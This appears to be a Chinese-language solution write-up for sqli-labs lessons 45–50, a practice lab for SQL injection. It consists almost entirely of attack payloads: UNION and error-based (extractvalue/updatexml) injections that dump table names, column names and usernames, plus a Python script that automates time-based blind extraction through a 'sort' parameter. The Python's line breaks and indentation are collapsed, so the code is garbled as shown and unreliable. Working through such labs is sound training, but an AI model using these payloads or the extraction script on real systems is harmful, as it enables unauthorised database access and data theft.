sqli-labs(9)

45.

不会显示报错信息通过or 1验证

在密码处输入')or('1

登录成功

')union select 1,2,3 #

')union select 1,database(),3 #

')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #

')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #

')union select 1,(select group_concat(username) from security.users),3 #

46.

单双引号都报错’

后面是order by使用and 1=1 是验证不了的

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))

47.

1'失败

1‘ --+成功

1“成功

1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and(updatexml(1,concat(0x7e,database(),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)) --+

48.

发现页面无报错回显，这里还是order by 无法使用union

使用延时注入

1 and if(substr(database(),1,1)='s',sleep(2),0)

用脚本进行爆破

import requests,timedef database():database_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:database_name += charprint(f"数据库名称为：{database_name}")breakelse:breakreturn database_namedatas = database()
print("最终数据库名称为：",datas)

1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(2),0) --+

def tablename():table_name =''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:table_name += charprint(f"表名称为：{table_name}")breakelse:breakreturn table_nametables =  tablename()
print("最终表名称为：",tables)

1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(2),0) --+

def columnname():column_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:column_name += charprint(f"列名称为：{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print("最终列名称为：",columns)

1 and if(substr((select username from security.users limit 1,1),1,1)='a',sleep(2),0) --+

def datas():data  = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url) end_time = time.time()  rsp.time = end_time - start_time    if rsp.time >= 2:data += charprint(f"数据为：{data}")breakelse:breakreturn data
das = datas()
print("最终数据为：",das)

完整的脚本

import requests,timedef database():database_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:database_name += charprint(f"数据库名称为：{database_name}")breakelse:breakreturn database_namedatas = database()
print("最终数据库名称为：",datas)def tablename():table_name =''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:table_name += charprint(f"表名称为：{table_name}")breakelse:breakreturn table_nametables =  tablename()
print("最终表名称为：",tables)def columnname():column_name = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url)end_time = time.time()rsp.time = end_time - start_timeif rsp.time >= 2:column_name += charprint(f"列名称为：{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print("最终列名称为：",columns)def datas():data  = ''charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'while True:for char in charset:payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"url = f'http://192.168.1.200:86/Less-48/?sort={payload}'start_time = time.time()rsp = requests.get(url) end_time = time.time()  rsp.time = end_time - start_time    if rsp.time >= 2:data += charprint(f"数据为：{data}")breakelse:breakreturn data
das = datas()
print("最终数据为：",das)

49.

和上面比多了’

50.

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))